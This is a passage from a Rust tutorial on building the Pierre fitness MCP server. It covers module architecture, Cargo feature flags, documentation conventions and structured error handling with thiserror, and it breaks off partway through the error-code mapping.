Pierre MCP Server Tutorial
Welcome to the comprehensive tutorial for building production-grade MCP (Model Context Protocol) servers in Rust.
What You’ll Learn
This tutorial takes you through every aspect of the Pierre Fitness Intelligence platform, a real-world production MCP server implementation. You’ll learn:
- Production Rust Architecture - Module organization, error handling, configuration management
- Security & Authentication - JWT tokens, cryptographic key management, multi-tenant isolation
- Protocol Implementation - JSON-RPC 2.0, MCP protocol, A2A (Agent-to-Agent) communication
- OAuth 2.0 - Both server and client implementations with PKCE support
- Provider Integration - Pluggable provider architecture for fitness APIs (Strava, Garmin, Fitbit, etc.)
- Sports Science - Real algorithms for TSS, VDOT, FTP, CTL/ATL/TSB
- Testing - Comprehensive testing patterns for async Rust applications
Prerequisites
Before starting this tutorial, you should have:
- Basic Rust knowledge (ownership, borrowing, traits, async/await)
- Familiarity with
cargoand Rust project structure - Understanding of HTTP APIs and JSON
- Basic knowledge of OAuth 2.0 (helpful but not required)
How to Use This Tutorial
Each chapter builds on previous ones but can also be read standalone for reference:
- Chapters 1-4: Start here for foundational concepts
- Chapters 5-8: Security-focused deep dive
- Chapters 9-14: Protocol implementation details
- Chapters 15-18: OAuth and provider integration
- Chapters 19-22: Domain-specific implementation
- Chapters 23-31: Operations and advanced topics
Each chapter includes:
- Prerequisites - Prior knowledge needed
- Code Examples - Real code from the Pierre codebase
- Rust Idioms - Explanations of patterns and best practices
About Pierre
Pierre is a fitness intelligence platform that provides:
- 47 MCP tools for fitness data analysis
- Multi-tenant SaaS architecture with complete data isolation
- OAuth 2.0 server for MCP client authentication
- Pluggable provider system supporting Strava, Garmin, Fitbit, WHOOP, COROS, and Terra
- Sports science algorithms for training load, performance, and recovery analysis
- Local LLM support via OpenAI-compatible APIs (Ollama, vLLM, LocalAI)
The codebase demonstrates production-grade Rust patterns:
- Zero
unsafecode policy (with one approved FFI exception) - Structured error handling (no
anyhow!in production) - Comprehensive test coverage (~650 tests)
- ~330 source files in a well-organized module hierarchy
Getting Started
Let’s begin with Chapter 1: Project Architecture to understand how the codebase is organized.
This tutorial is maintained alongside the Pierre MCP Server codebase.
Chapter 1: Project Architecture & Module Organization
Introduction
Pierre Fitness Platform is a production Rust application with 330 source files organized into a coherent module hierarchy. This chapter teaches you how to navigate the codebase, understand the module system, and recognize organizational patterns used throughout.
The codebase follows a “library + binaries” pattern where most functionality lives in src/lib.rs and binary entry points import from the library.
Project Structure Overview
pierre_mcp_server/
├── src/ # main rust source (library + modules)
│ ├── lib.rs # library root - central module hub
│ ├── bin/ # binary entry points
│ │ ├── pierre-mcp-server.rs # main server binary
│ │ └── admin_setup.rs # admin utilities
│ ├── mcp/ # mcp protocol implementation
│ ├── a2a/ # agent-to-agent protocol
│ ├── protocols/ # universal protocol layer
│ ├── oauth2_server/ # oauth2 authorization server
│ ├── oauth2_client/ # oauth2 client (for providers)
│ ├── providers/ # fitness provider integrations
│ ├── intelligence/ # sports science algorithms
│ ├── database/ # database repositories (13 focused traits)
│ ├── database_plugins/ # pluggable database backends (SQLite/PostgreSQL)
│ ├── middleware/ # http middleware (auth, tracing, etc)
│ ├── routes/ # http route handlers
│ └── [30+ other modules]
│
├── sdk/ # typescript sdk for stdio transport
│ ├── src/
│ │ ├── bridge.ts # stdio ↔ http bridge (2309 lines)
│ │ ├── types.ts # auto-generated tool types
│ │ └── secure-storage.ts # os keychain integration
│ └── test/ # sdk e2e tests
│
├── tests/ # integration & e2e tests
│ ├── helpers/
│ │ ├── synthetic_data.rs # fitness data generator
│ │ └── test_utils.rs # shared test utilities
│ └── [194 test files]
│
├── scripts/ # build & utility scripts
│ ├── generate-sdk-types.js # typescript type generation
│ └── lint-and-test.sh # ci validation script
│
├── templates/ # html templates (oauth pages)
├── docs/ # documentation
└── Cargo.toml # rust dependencies & config
Key Observation: The codebase is split into library code (src/lib.rs) and binary code (src/bin/). This is a Rust best practice for testability and reusability.
The Library Root: src/lib.rs
The src/lib.rs file is the central hub of the Pierre library. It declares all public modules and controls what’s exported to consumers.
File Header Pattern
Source: src/lib.rs:1-9
#![allow(unused)]
fn main() {
// ABOUTME: Main library entry point for Pierre fitness API platform
// ABOUTME: Provides MCP, A2A, and REST API protocols for fitness data analysis
//
// Licensed under either of Apache License, Version 2.0 or MIT License at your option.
// Copyright ©2025 Async-IO.org
#![recursion_limit = "256"]
#![deny(unsafe_code)]
}
Rust Idioms Explained:
-
// ABOUTME:comments - Human-readable file purpose (not rustdoc)- Quick context for developers scanning the codebase
- Appears at top of all 330 source files
-
Crate-level attributes
#![...]-
#![recursion_limit = "256"]: Increases macro recursion limit- Required for complex derive macros (serde, thiserror)
- Default is 128, Pierre uses 256 for deeply nested types
-
#![deny(unsafe_code)]: Zero-tolerance unsafe code policy- Compiler error if
unsafeblock appears anywhere - Exception:
src/health.rs(Windows FFI, approved via validation script) - See:
scripts/architectural-validation.shfor enforcement
- Compiler error if
-
Reference: Rust Reference - Crate Attributes
Module Documentation
Source: src/lib.rs:10-55
//! # Pierre MCP Server
//!
//! A Model Context Protocol (MCP) server for fitness data aggregation and analysis.
//! This server provides a unified interface to access fitness data from various providers
//! like Strava and Fitbit through the MCP protocol.
//!
//! ## Features
//!
//! - **Multi-provider support**: Connect to Strava, Fitbit, and more
//! - **OAuth2 authentication**: Secure authentication flow for fitness providers
//! - **MCP protocol**: Standard interface for Claude and other AI assistants
//! - **Real-time data**: Access to activities, athlete profiles, and statistics
//! - **Extensible architecture**: Easy to add new fitness providers
//!
//! ## Quick Start
//!
//! 1. Set up authentication credentials using the `auth-setup` binary
//! 2. Start the MCP server with `pierre-mcp-server`
//! 3. Connect from Claude or other MCP clients
//!
//! ## Architecture
//!
//! The server follows a modular architecture:
//! - **Providers**: Abstract fitness provider implementations
//! - **Models**: Common data structures for fitness data
//! - **MCP**: Model Context Protocol server implementation
//! - **OAuth2**: Authentication client for secure API access
//! - **Config**: Configuration management and persistence
//!
//! ## Example Usage
//!
//! ```rust,no_run
//! use pierre_mcp_server::config::environment::ServerConfig;
//! use pierre_mcp_server::errors::AppResult;
//!
//! #[tokio::main]
//! async fn main() -> AppResult<()> {
//! // Load configuration
//! let config = ServerConfig::from_env()?;
//!
//! // Start Pierre MCP Server with loaded configuration
//! println!("Pierre MCP Server configured with port: HTTP={}",
//! config.http_port);
//!
//! Ok(())
//! }
//! ```
Rust Idioms Explained:
-
Module-level docs
//!(three slashes + bang)- Appears in
cargo docoutput - Documents the containing module/crate
- Markdown formatted for rich documentation
- Appears in
-
```rust,no_run` code blocks
- Syntax highlighted in docs
,no_runflag: compile-checked but not executed in doc tests- Ensures examples stay up-to-date with code
Reference: Rust Book - Documentation Comments
Module Declarations
Source: src/lib.rs:57-189
#![allow(unused)]
fn main() {
/// Fitness provider implementations for various services
pub mod providers;
/// Common data models for fitness data
pub mod models;
/// Cursor-based pagination for efficient data traversal
pub mod pagination;
/// Configuration management and persistence
pub mod config;
/// Focused dependency injection contexts
pub mod context;
/// Application constants and configuration values
pub mod constants;
/// OAuth 2.0 client (Pierre as client to fitness providers)
pub mod oauth2_client;
/// Model Context Protocol server implementation
pub mod mcp;
/// Athlete Intelligence for activity analysis and insights
pub mod intelligence;
/// External API clients (USDA, weather services)
pub mod external;
/// Configuration management and runtime parameter system
pub mod configuration;
// ... 30+ more module declarations
}
Rust Idioms Explained:
-
pub moddeclarations- Makes module public to external crates
- Each
pub mod foo;looks for:src/foo.rs(single-file module), ORsrc/foo/mod.rs(directory module)
-
Documentation comments
///(three slashes)- Documents the item below (not the containing module)
- Brief one-line summaries for each module
- Visible in IDE tooltips and
cargo doc
-
Module ordering - Logical grouping:
- Core domain (providers, models, pagination)
- Configuration (config, context, constants)
- Protocols (oauth2_client, mcp, a2a, protocols)
- Data layer (database, database_plugins, cache)
- Infrastructure (auth, crypto, routes, middleware)
- Features (intelligence, external, plugins)
- Utilities (types, utils, test_utils)
Reference: Rust Book - Modules
Conditional Compilation
Source: src/lib.rs:188-189
#![allow(unused)]
fn main() {
/// Test utilities for creating consistent test data
#[cfg(any(test, feature = "testing"))]
pub mod test_utils;
}
Rust Idioms Explained:
-
#[cfg(...)]attribute- Conditional compilation based on configuration
- Code only included if conditions are met
-
#[cfg(any(test, feature = "testing"))]test: Built-in flag when runningcargo testfeature = "testing": Custom feature flag fromCargo.toml:47any(...): Include if ANY condition is true
-
Why use this?
test_utilsmodule only needed during testing- Excluded from production binary (reduces binary size)
- Can be enabled in other crates via
features = ["testing"]
Cargo.toml configuration:
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
testing = [] # Feature flag for test utilities
Reference: Rust Book - Conditional Compilation
Binary Entry Points: src/bin/
Rust crates can define multiple binary targets. Pierre has two main binaries:
Main Server Binary
Source: src/bin/pierre-mcp-server.rs:1-61
// ABOUTME: Server implementation for serving users with isolated data access
// ABOUTME: Production-ready server with authentication and user isolation capabilities
#![recursion_limit = "256"]
#![deny(unsafe_code)]
//! # Pierre Fitness API Server Binary
//!
//! This binary starts the multi-protocol Pierre Fitness API with user authentication,
//! secure token storage, and database management.
use anyhow::Result;
use clap::Parser;
use pierre_mcp_server::{
config::environment::{ServerConfig, TokioRuntimeConfig},
database_plugins::factory::Database,
mcp::{multitenant::MultiTenantMcpServer, resources::ServerResources},
// ... other imports
};
use tokio::runtime::{Builder, Runtime};
/// Command-line arguments for the Pierre MCP server
#[derive(Parser)]
#[command(name = "pierre-mcp-server")]
#[command(version = env!("CARGO_PKG_VERSION"))]
#[command(about = "Pierre Fitness API - Multi-protocol fitness data API for LLMs")]
pub struct Args {
/// Configuration file path for providers
#[arg(short, long)]
config: Option<String>,
/// Override HTTP port
#[arg(long)]
http_port: Option<u16>,
}
fn main() -> Result<()> {
let args = parse_args_or_default();
// Load runtime config first to build the Tokio runtime
let runtime_config = TokioRuntimeConfig::from_env();
let runtime = build_tokio_runtime(&runtime_config)?;
// Run the async server on our configured runtime
runtime.block_on(async {
let config = setup_configuration(&args)?;
bootstrap_server(config).await
})
}
Rust Idioms Explained:
-
Binary crate attributes - Same as library (
#![...])- Each binary can have its own attributes
- Often mirrors library settings
-
use pierre_mcp_server::...- Importing from library- Binary depends on library crate
- Imports only what’s needed
- Absolute paths from crate root
-
clap::Parserderive macro- Auto-generates CLI argument parser
#[command(...)]attributes for metadata#[arg(...)]attributes for options- Generates
--helpautomatically
-
Manual Tokio runtime building
- Pierre uses
TokioRuntimeConfig::from_env()for configurable runtime - Worker threads and stack size configurable via environment
- More control than
#[tokio::main]macro:
- Pierre uses
#![allow(unused)]
fn main() {
// Pierre's configurable runtime builder
fn build_tokio_runtime(config: &TokioRuntimeConfig) -> Result<Runtime> {
let mut builder = Builder::new_multi_thread();
if let Some(workers) = config.worker_threads {
builder.worker_threads(workers);
}
builder.enable_all().build().map_err(Into::into)
}
}
Reference:
Cargo.toml Binary Declarations
Source: Cargo.toml:14-29
[lib]
name = "pierre_mcp_server"
path = "src/lib.rs"
[[bin]]
name = "pierre-mcp-server"
path = "src/bin/pierre-mcp-server.rs"
[[bin]]
name = "admin-setup"
path = "src/bin/admin_setup.rs"
[[bin]]
name = "diagnose-weather-api"
path = "src/bin/diagnose_weather_api.rs"
Explanation:
[lib]: Single library target[[bin]]: Multiple binary targets (double brackets = array)- Binary names can differ from file names (kebab-case vs snake_case)
Build commands:
# Build all binaries
cargo build --release
# Run specific binary
cargo run --bin pierre-mcp-server
# Install binary to ~/.cargo/bin
cargo install --path . --bin pierre-mcp-server
Module Organization Patterns
Pierre uses several module organization patterns consistently.
Single-File Modules
Example: src/errors.rs
src/
├── lib.rs # Contains: pub mod errors;
└── errors.rs # The module implementation
When module fits in one file (~100-500 lines), use single-file pattern.
Directory Modules
Example: src/mcp/ directory
src/
├── lib.rs # Contains: pub mod mcp;
└── mcp/
├── mod.rs # Module root, declares submodules
├── protocol.rs # Submodule
├── tool_handlers.rs # Submodule
├── multitenant.rs # Submodule
└── [8 more files]
Source: src/mcp/mod.rs:1-40
#![allow(unused)]
fn main() {
// ABOUTME: MCP (Model Context Protocol) server implementation
// ABOUTME: JSON-RPC 2.0 protocol for AI assistant tool execution
//! MCP Protocol Implementation
//!
//! This module implements the Model Context Protocol (MCP) for AI assistant integration.
//! MCP is a JSON-RPC 2.0 based protocol that enables AI assistants like Claude to execute
//! tools and access resources from external services.
// Submodule declarations
pub mod protocol;
pub mod tool_handlers;
pub mod multitenant;
pub mod resources;
pub mod tenant_isolation;
pub mod oauth_flow_manager;
pub mod transport_manager;
pub mod mcp_request_processor;
pub mod server_lifecycle;
pub mod progress;
pub mod schema;
// Re-exports for convenience
pub use multitenant::MultiTenantMcpServer;
pub use resources::ServerResources;
pub use protocol::{McpRequest, McpResponse};
}
Rust Idioms Explained:
-
mod.rsconvention- Directory modules need a
mod.rsfile - Acts as the “index” file for the directory
- Declares and organizes submodules
- Directory modules need a
-
Re-exports
pub use ...- Makes deeply nested types accessible at module root
- Users can write
use pierre_mcp_server::mcp::MultiTenantMcpServer - Instead of
use pierre_mcp_server::mcp::multitenant::MultiTenantMcpServer
-
Submodule visibility
pub modmakes submodule publicmod(withoutpub) keeps it private to parent module- All Pierre submodules are public for flexibility
Reference: Rust Book - Separating Modules into Different Files
Nested Directory Modules
Example: src/protocols/universal/handlers/
src/
└── protocols/
├── mod.rs
└── universal/
├── mod.rs
└── handlers/
├── mod.rs
├── fitness_api.rs
├── intelligence.rs
├── goals.rs
├── configuration.rs
├── sleep_recovery.rs
├── nutrition.rs
├── recipes.rs
└── connections.rs
Source: src/protocols/universal/handlers/mod.rs
#![allow(unused)]
fn main() {
//! MCP tool handlers for all tool categories
pub mod fitness_api;
pub mod intelligence;
pub mod goals;
pub mod configuration;
pub mod sleep_recovery;
pub mod nutrition;
pub mod recipes;
pub mod connections;
// Re-export all handler functions
pub use fitness_api::*;
pub use intelligence::*;
pub use goals::*;
pub use configuration::*;
pub use sleep_recovery::*;
pub use nutrition::*;
pub use recipes::*;
pub use connections::*;
}
Pattern: Deep hierarchies use mod.rs at each level to organize related functionality.
Feature Flags & Conditional Compilation
Pierre uses feature flags for optional dependencies and database backends.
Source: Cargo.toml:42-47
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
testing = []
telemetry = []
Feature Flag Usage
1. Default features
default = ["sqlite"]
Builds with SQLite by default. Users can opt out:
cargo build --no-default-features
2. Database backend selection
Source: src/database_plugins/factory.rs:30-50
#![allow(unused)]
fn main() {
pub async fn new(
connection_string: &str,
encryption_key: Vec<u8>,
#[cfg(feature = "postgresql")]
postgres_pool_config: &PostgresPoolConfig,
) -> Result<Self, DatabaseError> {
#[cfg(feature = "sqlite")]
if connection_string.starts_with("sqlite:") {
let sqlite_db = SqliteDatabase::new(connection_string, encryption_key).await?;
return Ok(Database::Sqlite(sqlite_db));
}
#[cfg(feature = "postgresql")]
if connection_string.starts_with("postgres://") || connection_string.starts_with("postgresql://") {
let postgres_db = PostgresDatabase::new(
connection_string,
encryption_key,
postgres_pool_config,
).await?;
return Ok(Database::Postgres(postgres_db));
}
Err(DatabaseError::ConfigurationError(
"Unsupported database type in connection string".to_string()
))
}
}
Rust Idioms Explained:
-
#[cfg(feature = "...")]- Code only compiled if feature is enabled
sqlitefeature compiles SQLite codepostgresqlfeature compiles PostgreSQL code
-
Function parameter attributes
#![allow(unused)] fn main() { #[cfg(feature = "postgresql")] postgres_pool_config: &PostgresPoolConfig, }- Parameter only exists if feature is enabled
- Type checking happens only when feature is active
-
Build commands:
# SQLite (default) cargo build # PostgreSQL cargo build --no-default-features --features postgresql # Both cargo build --features postgresql
Reference: Cargo Book - Features
Documentation Patterns
Pierre follows consistent documentation practices across all 330 source files.
Dual-Comment Pattern
Every file has both // ABOUTME: and //! comments:
#![allow(unused)]
fn main() {
// ABOUTME: Brief human-readable purpose
// ABOUTME: Additional context
//
// License header
//! # Module Title
//!
//! Detailed rustdoc documentation
//! with markdown formatting
}
Benefits:
// ABOUTME:: Quick context when browsing files (shows in editors)//!: Full documentation forcargo docoutput- Separation of concerns: quick ref vs comprehensive docs
Rustdoc Formatting
Source: src/mcp/protocol.rs:1-30
#![allow(unused)]
fn main() {
//! # MCP Protocol Implementation
//!
//! Core protocol handlers for the Model Context Protocol (MCP).
//! Implements JSON-RPC 2.0 message handling and tool execution.
//!
//! ## Supported Methods
//!
//! - `initialize`: Protocol version negotiation
//! - `tools/list`: List available tools
//! - `tools/call`: Execute a tool
//! - `resources/list`: List available resources
//!
//! ## Example
//!
//! ```rust,ignore
//! use pierre_mcp_server::mcp::protocol::handle_mcp_request;
//!
//! let response = handle_mcp_request(request).await?;
//! ```
}
Markdown features:
#headers (h1, h2, h3)-bullet lists`inline code```rustcode blocks**bold**and*italic*
Generate docs:
cargo doc --open # Generate & open in browser
Reference: Rust Book - Documentation
Import Conventions
Pierre follows consistent import patterns for clarity.
Absolute vs Relative Imports
Preferred: Absolute imports from crate root
#![allow(unused)]
fn main() {
use crate::errors::AppError;
use crate::database::DatabaseError;
use crate::providers::ProviderError;
}
Avoid: Relative imports
#![allow(unused)]
fn main() {
// Don't do this
use super::super::errors::AppError;
use ../database::DatabaseError; // Not valid Rust
}
Exception: Sibling modules in same directory can use super::
#![allow(unused)]
fn main() {
// In src/protocols/universal/handlers/goals.rs
use super::super::executor::UniversalToolExecutor; // Acceptable
use crate::protocols::universal::executor::UniversalToolExecutor; // Better
}
Grouping Imports
Source: src/bin/pierre-mcp-server.rs:15-24
#![allow(unused)]
fn main() {
// Group 1: External crates
use clap::Parser;
use std::sync::Arc;
use tracing::{error, info};
// Group 2: Internal crate imports
use pierre_mcp_server::{
auth::AuthManager,
cache::factory::Cache,
config::environment::ServerConfig,
database_plugins::{factory::Database, DatabaseProvider},
errors::AppResult,
logging,
mcp::{multitenant::MultiTenantMcpServer, resources::ServerResources},
};
}
Convention:
- External dependencies (
clap,std,tracing) - Internal crate (
pierre_mcp_server::...) - Blank line between groups
Reference: Rust Style Guide
Navigating the Codebase
Finding Functionality
Strategy 1: Start from src/lib.rs module declarations
- Each
pub modhas a one-line summary - Navigate to module’s
mod.rsfor details
Strategy 2: Use grep or IDE search
# Find all files containing "OAuth"
grep -r "OAuth" src/
# Find struct definitions
grep -r "pub struct" src/
Strategy 3: Follow imports
- Open a file, read its
usestatements - Imports show dependencies and related modules
Understanding Module Responsibilities
MCP Protocol (src/mcp/):
- protocol.rs: Core JSON-RPC handlers
- tool_handlers.rs: Tool execution routing
- multitenant.rs: Multi-tenant server wrapper
- resources.rs: Shared server resources
Protocols Layer (src/protocols/universal/):
- tool_registry.rs: Type-safe tool routing
- executor.rs: Tool execution engine
- handlers/: Business logic for each tool
Database (src/database_plugins/):
- factory.rs: Database abstraction
- sqlite.rs: SQLite implementation
- postgres.rs: PostgreSQL implementation
Diagram: Module Dependency Graph
┌─────────────────────────────────────────────────────────────┐
│ src/lib.rs │
│ (central module hub) │
└─────────────┬────────────────────────┬──────────────────────┘
│ │
┌────────▼────────┐ ┌───────▼────────┐
│ src/bin/ │ │ Public Modules │
│ - main server │ │ (40+ modules) │
│ - admin tools │ └───────┬─────────┘
└─────────────────┘ │
│
┌───────────────────────┼──────────────────────┐
│ │ │
┌────────▼────────┐ ┌─────────▼────────┐ ┌─────────▼────────┐
│ Protocols │ │ Data Layer │ │ Infrastructure │
│ - mcp/ │ │ - database/ │ │ - auth │
│ - a2a/ │ │ - database_ │ │ - middleware │
│ - protocols/ │ │ plugins/ │ │ - routes │
│ - jsonrpc/ │ │ - cache/ │ │ - logging │
└─────────────────┘ └──────────────────┘ └──────────────────┘
│ │ │
│ │ │
┌────────▼────────────────┐ │ ┌────────────▼──────────┐
│ Domain Logic │ │ │ External Services │
│ - providers/ │ │ │ - oauth2_client │
│ - intelligence/ │ │ │ - oauth2_server │
│ - configuration/ │ │ │ - external/ │
└─────────────────────────┘ │ └───────────────────────┘
│
┌────────────▼──────────┐
│ Shared Utilities │
│ - models │
│ - errors │
│ - types │
│ - utils │
│ - constants │
└───────────────────────┘
Key Observations:
- lib.rs is the hub connecting all modules
- Protocols layer is protocol-agnostic (shared by MCP & A2A)
- Data layer is abstracted (pluggable backends)
- Infrastructure is cross-cutting (auth, middleware, logging)
- Domain logic is isolated (providers, intelligence)
Rust Idioms Summary
| Idiom | Purpose | Example Location |
|---|---|---|
Crate attributes #![...] | Set compiler flags/limits | src/lib.rs:7-8 |
Module docs //! | Document containing module | All mod.rs files |
Item docs /// | Document following item | src/lib.rs:58+ |
pub mod | Public module declaration | src/lib.rs:57-189 |
Re-exports pub use | Convenience exports | src/mcp/mod.rs:24-26 |
Feature flags #[cfg(...)] | Conditional compilation | src/database_plugins/factory.rs |
Binary targets [[bin]] | Multiple executables | Cargo.toml:15-29 |
References:
Key Takeaways
- Library + Binaries Pattern: Core logic in
lib.rs, entry points inbin/ - Module Hierarchy: Use
pub modin parent,mod.rsfor directory modules - Dual Documentation:
// ABOUTME:for humans,//!for rustdoc - Feature Flags: Enable optional functionality (
sqlite,postgresql,testing) - Import Conventions: Absolute paths from
crate::, grouped by origin - Zero Unsafe Code:
#![deny(unsafe_code)]enforced via CI
Next Chapter
Chapter 2: Error Handling & Type-Safe Errors - Learn how Pierre uses thiserror for structured error types and eliminates anyhow! from production code.
Chapter 2: Error Handling & Type-Safe Errors
Introduction
Error handling is one of Rust’s greatest strengths. Unlike languages with exceptions, Rust uses the type system to enforce error handling at compile time. Pierre takes this further with a zero-tolerance policy on ad-hoc errors.
CLAUDE.md Directive (critical):
Never use
anyhow::anyhow!()in production codeUse structured error types exclusively:
AppError,DatabaseError,ProviderError
This chapter teaches you why this matters and how Pierre implements production-grade error handling.
The Problem with Anyhow
The anyhow crate is popular for quick prototyping, but has serious issues in production code.
Anyhow Example (Anti-pattern)
#![allow(unused)]
fn main() {
// DON'T DO THIS - Loses type information
use anyhow::anyhow;
fn fetch_user(id: &str) -> anyhow::Result<User> {
if id.is_empty() {
return Err(anyhow!("User ID cannot be empty")); // ❌ Type-erased error
}
let user = database.get(id)
.ok_or_else(|| anyhow!("User not found"))?; // ❌ No structure
Ok(user)
}
}
Problems:
- Type erasure: All errors become
anyhow::Error(opaque box) - No pattern matching: Can’t handle different error types differently
- No programmatic access: Error details are just strings
- Poor API: Callers can’t know what errors to expect
- No HTTP mapping: How do you convert “User not found” to status code?
Structured Error Example (Correct)
Source: src/database/errors.rs:11-20
#![allow(unused)]
fn main() {
// DO THIS - Type-safe, structured errors
#[derive(Error, Debug)]
pub enum DatabaseError {
#[error("Entity not found: {entity_type} with id '{entity_id}'")]
NotFound {
entity_type: &'static str,
entity_id: String,
},
// ... more variants
}
fn fetch_user(id: &str) -> Result<User, DatabaseError> {
if id.is_empty() {
return Err(DatabaseError::NotFound {
entity_type: "user",
entity_id: String::new(),
});
}
// Callers can pattern match on this specific error
database.get(id)
.ok_or_else(|| DatabaseError::NotFound {
entity_type: "user",
entity_id: id.to_string(),
})
}
}
Benefits:
- ✅ Type safety: Errors are concrete types
- ✅ Pattern matching: Can handle
NotFoundvsConnectionErrordifferently - ✅ Programmatic access: Extract
entity_idfrom error - ✅ Clear API: Callers know what to expect
- ✅ HTTP mapping: Easy to convert to status codes
Pierre’s Error Hierarchy
Pierre uses a three-tier error hierarchy:
AppError (src/errors.rs) ← HTTP-level errors
↓ wraps
├── DatabaseError (src/database/errors.rs) ← Database operations
├── ProviderError (src/providers/errors.rs) ← External API calls
└── ProtocolError (src/protocols/...) ← Protocol-specific errors
Design principle: Errors are defined close to their domain, then converted to AppError at API boundaries.
Thiserror: Derive Macro for Errors
The thiserror crate provides a derive macro that auto-implements std::error::Error and Display.
Basic Thiserror Usage
Source: src/database/errors.rs:11-56
#![allow(unused)]
fn main() {
use thiserror::Error;
#[derive(Error, Debug)]
pub enum DatabaseError {
/// Entity not found in database
#[error("Entity not found: {entity_type} with id '{entity_id}'")]
NotFound {
entity_type: &'static str,
entity_id: String,
},
/// Cross-tenant access attempt detected
#[error("Tenant isolation violation: attempted to access {entity_type} '{entity_id}' from tenant '{requested_tenant}' but it belongs to tenant '{actual_tenant}'")]
TenantIsolationViolation {
entity_type: &'static str,
entity_id: String,
requested_tenant: String,
actual_tenant: String,
},
/// Encryption operation failed
#[error("Encryption failed: {context}")]
EncryptionFailed {
context: String,
},
/// Decryption operation failed
#[error("Decryption failed: {context}")]
DecryptionFailed {
context: String,
},
/// Database constraint violation
#[error("Constraint violation: {constraint} - {details}")]
ConstraintViolation {
constraint: String,
details: String,
},
}
}
Rust Idioms Explained:
-
#[derive(Error, Debug)]Error: thiserror’s derive macroDebug: Required bystd::error::Errortrait- Auto-implements
Displayusing#[error(...)]attributes
-
#[error("...")]format strings- Defines the
Displayimplementation - Use
{field_name}to interpolate struct fields - Same syntax as
format!()macro
- Defines the
-
Enum variants with fields
- Struct-like variants:
NotFound { entity_type, entity_id } - Tuple variants:
ConnectionError(String) - Unit variants:
Timeout(no fields)
- Struct-like variants:
-
Documentation comments
///- Document each variant’s purpose
- Appears in IDE tooltips and
cargo doc
Generated code (what thiserror creates):
#![allow(unused)]
fn main() {
// thiserror automatically generates this:
impl std::fmt::Display for DatabaseError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
match self {
Self::NotFound { entity_type, entity_id } => {
write!(f, "Entity not found: {} with id '{}'", entity_type, entity_id)
}
// ... other variants
}
}
}
impl std::error::Error for DatabaseError {}
}
Reference: thiserror documentation
Error Variant Design Patterns
Pierre uses several patterns for error variants.
Pattern 1: Struct-Like Variants with Context
Source: src/providers/errors.rs:13-23
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum ProviderError {
/// Provider API is unavailable or returning errors
#[error("Provider {provider} API error: {status_code} - {message}")]
ApiError {
provider: String,
status_code: u16,
message: String,
retryable: bool, // ← Extra context for retry logic
},
}
}
Use when: You need multiple pieces of context (who, what, why)
Pattern matching:
#![allow(unused)]
fn main() {
match error {
ProviderError::ApiError { status_code: 429, provider, retry_after_secs, .. } => {
println!("Rate limited by {}, retry in {} seconds", provider, retry_after_secs);
}
ProviderError::ApiError { status_code, .. } if status_code >= 500 => {
println!("Server error, retry with backoff");
}
_ => println!("Non-retryable error"),
}
}
Pattern 2: Tuple Variants for Simple Errors
Source: src/database/errors.rs:57-59
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum DatabaseError {
/// Database connection error
#[error("Database connection error: {0}")]
ConnectionError(String),
// More examples:
/// Database query error
#[error("Query execution error: {context}")]
QueryError { context: String },
}
}
Use when: Single piece of context is sufficient
Creating:
#![allow(unused)]
fn main() {
return Err(DatabaseError::ConnectionError(
"Failed to connect to postgres://localhost:5432".to_string()
));
}
Pattern 3: Unit Variants for Simple Cases
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum ConfigError {
#[error("Configuration file not found")]
NotFound,
#[error("Permission denied accessing configuration")]
PermissionDenied,
}
}
Use when: Error needs no additional context
Pattern 4: Wrapping External Errors
Source: src/database/errors.rs:86-96
#![allow(unused)]
fn main() {
#[derive(Error, Debug)]
pub enum DatabaseError {
/// Underlying SQLx error
#[error("Database error: {0}")]
Sqlx(#[from] sqlx::Error), // ← Automatic conversion
/// Serialization/deserialization error
#[error("Serialization error: {0}")]
SerializationError(#[from] serde_json::Error),
/// UUID parsing error
#[error("Invalid UUID: {0}")]
InvalidUuid(#[from] uuid::Error),
// Note: No blanket anyhow::Error conversion - all errors are structured!
}
}
Rust Idioms Explained:
-
#[from]attribute- Auto-generates
From<ExternalError> for MyError - Enables
?operator to auto-convert errors
- Auto-generates
-
Generated
Fromimplementation:
#![allow(unused)]
fn main() {
// thiserror generates this:
impl From<sqlx::Error> for DatabaseError {
fn from(err: sqlx::Error) -> Self {
Self::Sqlx(err)
}
}
}
- Usage with
?operator:
#![allow(unused)]
fn main() {
fn get_user(id: &str) -> Result<User, DatabaseError> {
// sqlx::Error automatically converts to DatabaseError::Sqlx
let row = sqlx::query!("SELECT * FROM users WHERE id = ?", id)
.fetch_one(&pool)
.await?; // ← Auto-conversion happens here
Ok(user_from_row(row))
}
}
Reference: Rust Book - The ? Operator
Error Code System
Pierre maps domain errors to HTTP status codes and error codes.
Source: src/errors.rs:41-100
#![allow(unused)]
fn main() {
/// Standard error codes used throughout the application
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ErrorCode {
// Authentication & Authorization
AuthRequired, // 401
AuthInvalid, // 401
AuthExpired, // 403
AuthMalformed, // 403
PermissionDenied, // 403
// Rate Limiting
RateLimitExceeded, // 429
QuotaExceeded, // 429
// Validation
InvalidInput, // 400
MissingRequiredField,// 400
InvalidFormat, // 400
ValueOutOfRange, // 400
// Resource Management
ResourceNotFound, // 404
ResourceAlreadyExists, // 409
ResourceLocked, // 409
ResourceUnavailable, // 503
// External Services
ExternalServiceError, // 502
ExternalServiceUnavailable, // 502
ExternalAuthFailed, // 503
ExternalRateLimited, // 503
// Internal Errors
InternalError, // 500
DatabaseError, // 500
StorageError, // 500
SerializationError, // 500
}
}
HTTP Status Code Mapping
Source: src/errors.rs:87-138
#![allow(unused)]
fn main() {
impl ErrorCode {
/// Get the HTTP status code for this error
#[must_use]
pub const fn http_status(self) -> u16 {
match self {
// 400 Bad Request
Self::InvalidInput
| Self::MissingRequiredField
| Self::InvalidFormat
| Self::ValueOutOfRange => crate::constants::http_status::BAD_REQUEST,
// 401 Unauthorized - Authentication issues
Self::AuthRequired | Self::AuthInvalid =>
crate::constants::http_status::UNAUTHORIZED,
// 403 Forbidden - Authorization issues
Self::AuthExpired | Self::AuthMalformed | Self::PermissionDenied =>
crate::constants::http_status::FORBIDDEN,
// 404 Not Found
Self::ResourceNotFound => crate::constants::http_status::NOT_FOUND,
// 409 Conflict
